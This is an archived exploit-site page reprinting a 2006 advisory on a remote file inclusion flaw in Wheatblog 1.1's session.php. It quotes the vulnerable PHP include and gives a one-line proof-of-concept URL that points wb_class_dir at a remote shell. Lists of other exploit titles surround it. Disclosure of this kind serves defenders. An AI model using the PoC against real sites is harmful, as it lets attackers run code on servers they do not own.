exploits , vulnerabilities , articles , Wheatblog <= 1.1 (session.php) Remote File Include Vulnerability

2007-04-14 QDBlog 0.4 (SQL Injection/LFI) Multiple Remote Vulnerabilities
2007-04-09 MyBlog: PHP and MySQL Blog/CMS software RFI Vulnerability
2007-04-03 Xoops Module PopnupBlog <= 2.52 (postid) BLIND SQL Injection Exploit
2007-03-30 sBLOG 0.7.3 Beta (inc/lang.php) Local File Inclusion Exploit
2007-03-20 GeBlog 0.1 GLOBALS[tplname] Local File Inclusion Exploit (win)
2007-03-16 Particle Blogger <= 1.2.0 (post.php postid) Remote SQL Injection Exploit

2006-08-11

Wheatblog <= 1.1 (session.php) Remote File Include Vulnerability

Rated as : High Risk

###########################################################################################
#                                   Aria-Security.net Advisory            
               #
#                                 Discovered  by: O.U.T.L.A.W             
               #
#                                < www.Aria-security.net >          
                     #
#                      Gr33t to: A.u.r.a  & l2odon & DrtRp & Sh3ll        
               #              
###########################################################################################


<?php
include_once("$wb_class_dir/classDatabase.php");


function Start_Session()
{
    global $session_dir;

    if ( $session_dir != '' )
        session_save_path($session_dir);

    if ( ! isset($_SESSION) )
    {
        session_start();
        // Supposedly a fix for IE6
        header('Cache-control: private');
        My_Cache();

        if ( ! isset($_SESSION['db']) || gettype($_SESSION['db']->db)
!= 'resource')
            touchDatabaseSession();

    }
}


***********************************************************************

Proof of Concept:
www.site.com/includes/session.php?wb_class_dir=SHELL

Contact : Outlaw@aria-security.net
securitydot.net - 2006-08-11

Exploits - newest 10 RSS | More

2007-06-15 57299 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34221 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42446 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29342 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19779 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16714 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19416 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16599 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33615 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17240 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit